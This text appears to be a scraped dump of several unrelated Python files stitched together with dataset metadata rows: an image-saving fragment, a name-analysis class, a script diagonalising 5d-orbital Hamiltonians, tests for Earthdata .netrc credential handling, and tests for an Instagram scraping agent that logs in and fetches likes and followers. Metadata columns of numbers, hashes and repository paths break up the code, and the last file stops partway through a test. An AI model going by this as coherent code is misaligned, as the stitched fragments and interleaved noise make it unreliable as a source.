imagetype = imghdr.what(None, h=data) # 画像のタイプを判定して拡張子を取得。
if imagetype:
name += "." + imagetype
with open(name, 'wb') as fp:
fp.write(data) #
if __name__ == "__main__":
import sys
sys.exit(main())
| 372.607143
| 4,301
| 0.964919
| 93
| 10,433
| 108.150538
| 0.666667
| 0.000795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.471044
| 0.023483
| 10,433
| 28
| 4,302
| 372.607143
| 0.516196
| 0.011119
| 0
| 0
| 0
| 0
| 0.943647
| 0.932687
| 0
| 1
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.16
| 0
| 0.2
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e06444a57013ea8f9cd17fc6391a95143d0008d1
| 146
|
py
|
Python
|
api/namex/resources/auto_analyse/paths/bc_name_analysis/issues/contains_words_to_avoid.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | 1
|
2020-02-21T05:49:14.000Z
|
2020-02-21T05:49:14.000Z
|
api/namex/resources/auto_analyse/paths/bc_name_analysis/issues/contains_words_to_avoid.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | null | null | null |
api/namex/resources/auto_analyse/paths/bc_name_analysis/issues/contains_words_to_avoid.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | null | null | null |
from namex.resources.auto_analyse.issues import ContainsWordsToAvoidIssue
class BcContainsWordsToAvoidIssue(ContainsWordsToAvoidIssue):
pass
| 29.2
| 73
| 0.876712
| 12
| 146
| 10.583333
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082192
| 146
| 5
| 74
| 29.2
| 0.947761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
0ef2160b01cfb593942a01592777d46ec9b75696
| 13,038
|
py
|
Python
|
src/putils/findDiagonal/find5dRotation2.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | 7
|
2018-04-03T06:37:42.000Z
|
2021-11-08T11:44:06.000Z
|
src/putils/findDiagonal/find5dRotation2.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | null | null | null |
src/putils/findDiagonal/find5dRotation2.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | 3
|
2016-10-27T20:23:34.000Z
|
2019-12-13T13:54:11.000Z
|
from scipy import *
from scipy import linalg
import sys
import copy
def mprint(Us):
for i in range(shape(Us)[0]):
for j in range(shape(Us)[1]):
print "%11.8f %11.8f " % (real(Us[i,j]), imag(Us[i,j])),
print
def MakeOrthogonal(a, b, ii):
a -= (a[ii]/b[ii])*b
a *= 1/sqrt(dot(a,a.conj()))
b -= dot(b,a.conj())*a
b *= 1/sqrt(dot(b,b.conj()))
return (a,b)
def StringToMatrix(cfstr):
mm=[]
for line in cfstr.split('\n'):
line = line.strip()
if line:
data = array(map(float,line.split()))
mm.append( data[0::2]+data[1::2]*1j )
mm=matrix(mm)
return mm
def RealPhase(vec):
for j in range(len(vec)):
v = vec[j]
#print 'checkin j'
imax = 0
vmax = abs(v[imax])
for i in range(len(v)):
if abs(v[i])>vmax:
vmax=abs(v[i])
imax = i
#print 'imax', imax, v[imax]
vec[j,:] = array(v)*abs(v[imax])/v[imax]
return vec
def to_normalize(a):
return 1./sqrt(abs(dot(conj(a), a)))
def swap(a,b):
an = copy.deepcopy(a)
bn = copy.deepcopy(b)
return (bn,an)
strHc1="""
-2.00018980 0.00000000 0.00000000 0.00000000 -0.00004096 -0.24670234 0.00000000 0.00000000 0.00000000 0.00000000 0.17125395 0.18220260
0.00000000 0.00000000 -2.00018979 0.00000000 0.00000000 0.00000000 -0.00004096 0.24670234 0.17125395 -0.18220260 0.00000000 0.00000000
-0.00004096 0.24670234 0.00000000 0.00000000 -1.99983239 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.18221011 0.17125654
0.00000000 0.00000000 -0.00004096 -0.24670234 0.00000000 0.00000000 -1.99983239 0.00000000 -0.18221011 -0.17125654 0.00000000 0.00000000
0.00000000 0.00000000 0.17125395 0.18220260 0.00000000 0.00000000 -0.18221011 0.17125654 -1.65479986 0.00000000 0.00000000 0.00000000
0.17125395 -0.18220260 0.00000000 0.00000000 -0.18221011 -0.17125654 0.00000000 0.00000000 0.00000000 0.00000000 -1.65479986 0.00000000
"""
strHc2="""
-2.00018980 0.00000000 0.00000000 0.00000000 -0.00004096 -0.24670234 0.00000000 0.00000000 0.00000000 0.00000000 0.17125395 0.18220260
0.00000000 0.00000000 -2.00018979 0.00000000 0.00000000 0.00000000 -0.00004096 0.24670234 0.17125395 -0.18220260 0.00000000 0.00000000
-0.00004096 0.24670234 0.00000000 0.00000000 -1.99983239 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.18221011 0.17125654
0.00000000 0.00000000 -0.00004096 -0.24670234 0.00000000 0.00000000 -1.99983239 0.00000000 -0.18221011 -0.17125654 0.00000000 0.00000000
0.00000000 0.00000000 0.17125395 0.18220260 0.00000000 0.00000000 -0.18221011 0.17125654 -1.65479986 0.00000000 0.00000000 0.00000000
0.17125395 -0.18220260 0.00000000 0.00000000 -0.18221011 -0.17125654 0.00000000 0.00000000 0.00000000 0.00000000 -1.65479986 0.00000000
"""
strHc3="""
-2.00016629 0.00000000 0.00000000 0.00000000 -0.00008153 -0.24670254 0.00000000 0.00000000 0.00000000 0.00000000 0.17125296 0.18219979
0.00000000 0.00000000 -2.00016991 0.00000000 0.00000000 0.00000000 -0.00008153 0.24670261 0.17125291 -0.18219987 0.00000000 0.00000000
-0.00008153 0.24670254 0.00000000 0.00000000 -1.99961597 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.18220613 0.17125778
0.00000000 0.00000000 -0.00008153 -0.24670261 0.00000000 0.00000000 -1.99961959 0.00000000 -0.18220620 -0.17125773 0.00000000 0.00000000
0.00000000 0.00000000 0.17125291 0.18219987 0.00000000 0.00000000 -0.18220620 0.17125773 -1.65468685 0.00000000 0.00000000 0.00000000
0.17125296 -0.18219979 0.00000000 0.00000000 -0.18220613 -0.17125778 0.00000000 0.00000000 0.00000000 0.00000000 -1.65469210 0.00000000
"""
strHc4="""
-2.00016629 0.00000000 0.00000000 0.00000000 -0.00008153 -0.24670254 0.00000000 0.00000000 0.00000000 0.00000000 0.17125296 0.18219979
0.00000000 0.00000000 -2.00016991 0.00000000 0.00000000 0.00000000 -0.00008153 0.24670261 0.17125291 -0.18219987 0.00000000 0.00000000
-0.00008153 0.24670254 0.00000000 0.00000000 -1.99961597 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.18220613 0.17125778
0.00000000 0.00000000 -0.00008153 -0.24670261 0.00000000 0.00000000 -1.99961959 0.00000000 -0.18220620 -0.17125773 0.00000000 0.00000000
0.00000000 0.00000000 0.17125291 0.18219987 0.00000000 0.00000000 -0.18220620 0.17125773 -1.65468685 0.00000000 0.00000000 0.00000000
0.17125296 -0.18219979 0.00000000 0.00000000 -0.18220613 -0.17125778 0.00000000 0.00000000 0.00000000 0.00000000 -1.65469210 0.00000000
"""
strT2C="""
0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000
-0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000
"""
strT2Crest="""
0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000
"""
# -2-1 0 1 2 -2-1 0 1 2
# [0,1,2,3,4, 5,6,7,8,9]
# [9,8,7,6,5, 4,3,2,1,0]
# time-reversal
def GiveTrans(strHc, strT2C, strT2Crest):
Hc=StringToMatrix(strHc)[:6,:6]
T2C=StringToMatrix(strT2C)
T2Crest = StringToMatrix(strT2Crest)
#print 'T2Crest='
#mprint(T2Crest)
#print
ee = linalg.eigh(Hc)
Es = ee[0]
Us = matrix(ee[1])
#print 'In Eigensystem:'
#mprint(Us.H * Hc * Us)
# Us.H * Hc * Us === diagonal
print 'Eigenvalues=', Es.tolist()
for i0 in range(0,6,2):
i2=i0+2
vects = Us[:,i0:i2]
O = transpose(conj(vects))[0:2,i0:i2]
(u_,s_,v_) = linalg.svd(O)
print 'S=', s_.tolist()
m = min(shape(u_)[1],shape(v_)[0])
R = dot(u_[:,:m],v_[:m,:])
vectn = dot(vects,R)
Us[:,i0:i2] = vectn[:,:]
#print
#mprint( vectn )
#Us = u_ * s_ * v_
#c_ = zeros((shape(u_)[0],shape(v_)[1]),dtype=complex)
#for i in range(shape(u_)[0]):
# for l in range(shape(v_)[1]):
# for j in range(shape(u_)[1]):
# c_[i,l] += u_[i,j]*s_[j]*v_[j,l]
#print 'Eigenvalues'
#print "%10.5f "*len(Es) % tuple(Es)
print 'Transformation in crystal harmonics='
mprint(Us)
print
final = Us.T*T2C
final = array(final)
final2 = RealPhase(final)
# final2[0,:] -= final2[1,:] * final2[0,5]/final2[1,5]
# final2[1,:] -= final2[0,:] * final2[1,0]/final2[0,0]
# final2[0,:] *= to_normalize(final2[0,:])
# final2[1,:] *= to_normalize(final2[1,:])
#
# final2[2,:] -= final2[3,:] * final2[2,5]/final2[3,5]
# final2[3,:] -= final2[2,:] * final2[3,0]/final2[2,0]
# final2[2,:] *= to_normalize(final2[2,:])
# final2[3,:] *= to_normalize(final2[3,:])
#
# final2[4,:] -= final2[5,:] * final2[4,5]/final2[5,5]
# final2[5,:] -= final2[4,:] * final2[5,0]/final2[4,0]
# final2[4,:] *= to_normalize(final2[4,:])
# final2[5,:] *= to_normalize(final2[5,:])
# final2[0:2,:] = swap(final2[0,:],final2[1,:])
final=copy.deepcopy(final2)
return (final, T2C, Hc, T2Crest)
def Check(final, T2C, Hc):
# the modified final transofrmation is rotated back to t2g-eg base to see how weell diagonal remains
Us_new = transpose(matrix(final)*T2C.H)
print 'Check-diagonal:'
mprint(Us_new.H * Hc * Us_new)
print 'Check unitary:'
mprint( matrix(final) * matrix(final).H )
print
def CheckDet(final, T2Crest):
totalfinal = vstack((final,T2Crest))
Det = linalg.det(totalfinal)
print 'Determinant=', Det
if abs(Det+1)<1e-3:
print 'Determinant is -1, you need to change an eigenvector, to make the rotation proper!'
return Det
(final1, T2C, Hc1, T2Crest) = GiveTrans(strHc1, strT2C, strT2Crest)
(final2, T2C, Hc2, T2Crest) = GiveTrans(strHc2, strT2C, strT2Crest)
(final3, T2C, Hc3, T2Crest) = GiveTrans(strHc3, strT2C, strT2Crest)
(final4, T2C, Hc4, T2Crest) = GiveTrans(strHc4, strT2C, strT2Crest)
print 'Rotation to input : '
mprint( final1 )
print
mprint( final2 )
print
mprint( final3 )
print
mprint( final4 )
print
print 'rest='
mprint( T2Crest )
# correcting the transformation to have higher symmetry
# there is some freedom due to degenerate eigenvalues
# first the phase factors
# final[0,:] *= 1j
# final[1,:] *= abs(final[1,8])/final[1,8]
# final[2,:] *= -1j
# cc= final[3,6]/abs(final[3,6])
# final[3,:] *= 1/cc
# final[4,:] *= -1j
# cc = final[5,6]/abs(final[5,6])
# final[5,:] *= 1/cc
# # second linear combinations
# final[2,:],final[3,:] = MakeOrthogonal(final[2,:], final[3,:], 0)
# final[4,:],final[5,:] = MakeOrthogonal(final[4,:], final[5,:], 0)
# final[0,:] *= abs(final[0,8])/final[0,8]
# final[1,:] *= 1j
# final[3,:] *= -1j
# cc= final[2,6]/abs(final[2,6])
# final[2,:] *= 1/cc
# cc= final[4,6]/abs(final[4,6])
# final[4,:] *= 1/cc
# final[5,:] *= 1j
#a = final2[0]
#b = final2[1]
#print 'a*b=', dot(conj(a),b)
#print 'a*a=', dot(conj(a),a)
#print 'b*b=', dot(conj(b),b)
#print a.tolist()
#print b.tolist()
#print a[::-1].tolist()
#c1 = (b[::-1]-a)
#c2 = (b+a[::-1])
#for i in range(len(a)):
# print "%11.8f %11.8f " % (c1[i].real,c1[i].imag),
#print
#for i in range(len(a)):
# print "%11.8f %11.8f " % (c2[i].real,c2[i].imag),
#print
#print c2/c1
# y=sqrt(1-x^2)
# a_new = x*a+y*b
# b_new = -y.c*a+x.c*b
#
# T(x*a+y*b) = (-y.c*a+x.c*b)
# T(-y.c*a+x.c*b) = x*a+y*b
#
# x.c*Ta + y.c*Tb = -y.c*a+x.c*b
# -y*Ta+x*Tb = x*a+y*b
#
# x.c*(b-Ta) = y.c*(Tb+a)
# x*(Tb-a) = y*(b+Ta)
#
# y*(Tb+a) = x*(b-Ta)
# x*(Tb-a) = y*(b+Ta)
#
# x/y = (Tb+a)/(b-Ta)
# (x/y)**2 + 1 = 1/y**2
#
# y = sqrt(1/(1+(x/y)**2))
| 43.605351
| 241
| 0.582605
| 1,954
| 13,038
| 3.870522
| 0.103889
| 0.416501
| 0.431046
| 0.633082
| 0.608621
| 0.595266
| 0.589978
| 0.588126
| 0.588126
| 0.588126
| 0
| 0.494906
| 0.26975
| 13,038
| 298
| 242
| 43.751678
| 0.299443
| 0.200107
| 0
| 0.260563
| 0
| 0.239437
| 0.702546
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.028169
| null | null | 0.183099
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
162b6f3a446fe589a90fe785c7ee4b1c7564b21b
| 73
|
py
|
Python
|
python/cinn/optim.py
|
edithgogo/CINN
|
bed13f4752d80d01a3e1d96a4cc4f5aa56b1e292
|
[
"Apache-2.0"
] | 1
|
2019-10-23T09:16:23.000Z
|
2019-10-23T09:16:23.000Z
|
python/cinn/optim.py
|
edithgogo/CINN
|
bed13f4752d80d01a3e1d96a4cc4f5aa56b1e292
|
[
"Apache-2.0"
] | null | null | null |
python/cinn/optim.py
|
edithgogo/CINN
|
bed13f4752d80d01a3e1d96a4cc4f5aa56b1e292
|
[
"Apache-2.0"
] | null | null | null |
from .core_api.optim import simplify
from .core_api.optim import ir_copy
| 24.333333
| 36
| 0.835616
| 13
| 73
| 4.461538
| 0.615385
| 0.275862
| 0.37931
| 0.551724
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 73
| 2
| 37
| 36.5
| 0.892308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1662cdc4663bee606f8b997df607434398e36a18
| 3,032
|
py
|
Python
|
tests/test_main.py
|
ACCESS-cloud-based-InSAR/DockerizedTopsApp
|
b96b50cebd188ed3ca99e07f8b4c3e3483b5f853
|
[
"Apache-2.0"
] | 2
|
2021-11-12T19:58:01.000Z
|
2021-12-07T00:12:03.000Z
|
tests/test_main.py
|
ACCESS-Cloud-Based-InSAR/DockerizedTopsApp
|
d7d7b7101fc747517d85b52de03ac2fc6e08be16
|
[
"Apache-2.0"
] | 27
|
2021-11-09T22:10:55.000Z
|
2022-03-21T10:32:36.000Z
|
tests/test_main.py
|
ACCESS-Cloud-Based-InSAR/DockerizedTopsApp
|
d7d7b7101fc747517d85b52de03ac2fc6e08be16
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from isce2_topsapp.__main__ import ensure_earthdata_credentials
def test_main_check_earthdata_credentials_prefer_netrc(tmp_path, monkeypatch):
monkeypatch.setenv('HOME', str(tmp_path))
netrc = tmp_path / '.netrc'
netrc.write_text('machine foobar.nasa.gov login foo password bar')
ensure_earthdata_credentials(None, None, host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login foo password bar'
ensure_earthdata_credentials('biz', 'baz', host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login foo password bar'
monkeypatch.setenv('EARTHDATA_USERNAME', 'fizz')
monkeypatch.setenv('EARTHDATA_PASSWORD', 'buzz')
ensure_earthdata_credentials(None, None, host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login foo password bar'
ensure_earthdata_credentials('biz', 'baz', host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login foo password bar'
with pytest.raises(ValueError):
ensure_earthdata_credentials(None, None)
with pytest.raises(ValueError):
ensure_earthdata_credentials('biz', 'baz')
netrc.write_text('machine urs.earthdata.nasa.gov login foo password bar')
ensure_earthdata_credentials(None, None)
assert netrc.read_text() == 'machine urs.earthdata.nasa.gov login foo password bar'
def test_main_check_earthdata_credentials_fn_variables(tmp_path, monkeypatch):
monkeypatch.setenv('HOME', str(tmp_path))
netrc = tmp_path / '.netrc'
with pytest.raises(ValueError):
ensure_earthdata_credentials(None, None, host='foobar.nasa.gov')
with pytest.raises(ValueError):
ensure_earthdata_credentials('biz', None, host='foobar.nasa.gov')
with pytest.raises(ValueError):
ensure_earthdata_credentials(None, 'baz', host='foobar.nasa.gov')
ensure_earthdata_credentials('biz', 'baz', host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login biz password baz'
netrc.unlink()
monkeypatch.setenv('EARTHDATA_USERNAME', 'fizz')
monkeypatch.setenv('EARTHDATA_PASSWORD', 'buzz')
ensure_earthdata_credentials('biz', 'baz', host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login biz password baz'
def test_main_check_earthdata_credentials_env_variables(tmp_path, monkeypatch):
monkeypatch.setenv('HOME', str(tmp_path))
netrc = tmp_path / '.netrc'
monkeypatch.setenv('EARTHDATA_USERNAME', 'fizz')
with pytest.raises(ValueError):
ensure_earthdata_credentials(None, None, host='foobar.nasa.gov')
monkeypatch.setenv('EARTHDATA_PASSWORD', 'buzz')
ensure_earthdata_credentials(None, None, host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login fizz password buzz'
netrc.unlink()
ensure_earthdata_credentials(None, 'baz', host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login fizz password baz'
| 40.972973
| 87
| 0.737137
| 386
| 3,032
| 5.580311
| 0.121762
| 0.074745
| 0.126741
| 0.094708
| 0.940111
| 0.914113
| 0.863974
| 0.863974
| 0.837047
| 0.784123
| 0
| 0.000384
| 0.140831
| 3,032
| 73
| 88
| 41.534247
| 0.826488
| 0
| 0
| 0.764706
| 0
| 0
| 0.298153
| 0.014512
| 0
| 0
| 0
| 0
| 0.176471
| 1
| 0.058824
| false
| 0.27451
| 0.039216
| 0
| 0.098039
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
169d5fcaa66ddb3b6a054a250d86808f9d4a8885
| 11,617
|
py
|
Python
|
tests/auth.py
|
joker2017/InstaParser
|
a08d1af841bd1701458be8ea0daedc7fbec94575
|
[
"MIT"
] | null | null | null |
tests/auth.py
|
joker2017/InstaParser
|
a08d1af841bd1701458be8ea0daedc7fbec94575
|
[
"MIT"
] | null | null | null |
tests/auth.py
|
joker2017/InstaParser
|
a08d1af841bd1701458be8ea0daedc7fbec94575
|
[
"MIT"
] | null | null | null |
import pytest
from random import randint, choice
from instaparser.agents import AgentAccount
from instaparser.entities import Account, Media, Location, Tag, Comment
from tests.settings import accounts, creds, locations, photos, photo_sets, tags, videos
def parametrize(*args):
result = []
for variable in zip(*args):
result.append((creds["login"], creds["password"], *variable))
return result
@pytest.mark.parametrize("login,password", [(creds["login"], creds["password"])])
def test_auth(login, password):
agent = AgentAccount(login, password)
Account.clear_cache()
@pytest.mark.parametrize("login,password", [(creds["login"], creds["password"])])
def test_update(login, password):
agent = AgentAccount(login, password)
agent.update()
assert(not getattr(agent, "id") is None)
Account.clear_cache()
@pytest.mark.parametrize("login,password,username", parametrize(accounts))
def test_update_account(login, password, username):
agent = AgentAccount(login, password)
account = Account(username)
data = agent.update(account)
assert(not data is None)
Account.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photos))
def test_update_photo(login, password, shortcode):
agent = AgentAccount(login, password)
photo = Media(shortcode)
data = agent.update(photo)
assert(not photo.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photo_sets))
def test_update_photo_set(login, password, shortcode):
agent = AgentAccount(login, password)
photo_set = Media(shortcode)
data = agent.update(photo_set)
assert(not photo_set.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(videos))
def test_update_video(login, password, shortcode):
agent = AgentAccount(login, password)
video = Media(shortcode)
data = agent.update(video)
assert(video.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,id", parametrize(locations))
def test_update_location(login, password, id):
agent = AgentAccount(login, password)
location = Location(id)
data = agent.update(location)
Location.clear_cache()
@pytest.mark.parametrize("login,password,name", parametrize(tags))
def test_update_tag(login, password, name):
agent = AgentAccount(login, password)
tag = Tag(name)
data = agent.update(tag)
Tag.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(100, 500) for i in range(3)],
[choice(accounts) for i in range(3)]))
def test_get_media_account(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
data, pointer = agent.get_media(account, count=count)
assert(min(account.media_count, count) == len(data))
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,id",
parametrize([randint(100, 500) for i in range(3)],
[choice(locations) for i in range(3)]))
def test_get_media_location(login, password, count, id):
agent = AgentAccount(login, password)
location = Location(id)
data, pointer = agent.get_media(location, count=count)
assert(min(location.media_count, count) == len(data))
assert((pointer is None) == (location.media_count <= count))
Location.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,name",
parametrize([randint(100, 500) for i in range(3)],
[choice(tags) for i in range(3)]))
def test_get_media_tag(login, password, count, name):
agent = AgentAccount(login, password)
tag = Tag(name)
data, pointer = agent.get_media(tag, count=count)
assert(min(tag.media_count, count) == len(data))
assert((pointer is None) == (tag.media_count <= count))
Tag.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,shortcode",
parametrize([randint(100, 500) for i in range(3)],
[choice(photos+photo_sets+videos)]))
def test_get_likes(login, password, count, shortcode):
agent = AgentAccount(login, password)
media = Media(shortcode)
data, pointer = agent.get_likes(media, count=count)
assert(min(media.likes_count, count) == len(data))
assert((pointer is None) == (media.likes_count <= count))
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(100, 500) for i in range(3)],
[choice(accounts) for i in range(3)]))
def test_get_follows(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
data, pointer = agent.get_follows(account, count=count)
assert(min(account.follows_count, count) == len(data))
assert((pointer is None) == (account.follows_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(100, 500) for i in range(3)],
[choice(accounts) for i in range(3)]))
def test_get_followers(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
data, pointer = agent.get_followers(account, count=count)
assert(min(account.followers_count, count) == len(data))
assert((pointer is None) == (account.followers_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count", parametrize([randint(100, 500) for i in range(3)]))
def test_get_feed(login, password, count):
agent = AgentAccount(login, password)
data, pointer = agent.feed(count=count)
assert(count >= len(data))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_media_account_pointer(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_media(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,id",
parametrize([randint(1, 10)], [choice(locations)]))
def test_get_media_location_pointer(login, password, count, id):
agent = AgentAccount(login, password)
location = Location(id)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_media(location, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (location.media_count <= count))
Account.clear_cache()
Media.clear_cache()
Location.clear_cache()
@pytest.mark.parametrize("login,password,count,name",
parametrize([randint(1, 10)], [choice(tags)]))
def test_get_media_tag_pointer(login, password, count, name):
agent = AgentAccount(login, password)
tag = Tag(name)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_media(tag, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (tag.media_count <= count))
Account.clear_cache()
Media.clear_cache()
Tag.clear_cache()
@pytest.mark.parametrize("login,password,count,shortcode",
parametrize([randint(1, 10)], [choice(photos+photo_sets+videos)]))
def test_get_likes_pointer(login, password, count, shortcode):
agent = AgentAccount(login, password)
media = Media(shortcode)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_likes(media, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (media.likes_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_follows_pointer(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_follows(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.follows_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_followers_pointer(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_followers(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.followers_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count", parametrize([randint(1, 10)]))
def test_get_feed_pointer(login, password, count):
agent = AgentAccount(login, password)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.feed(pointer=pointer)
data.extend(tmp)
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photos))
def test_like_unlike_photo(login, password, shortcode):
agent = AgentAccount(login, password)
photo = Media(shortcode)
assert(agent.like(photo))
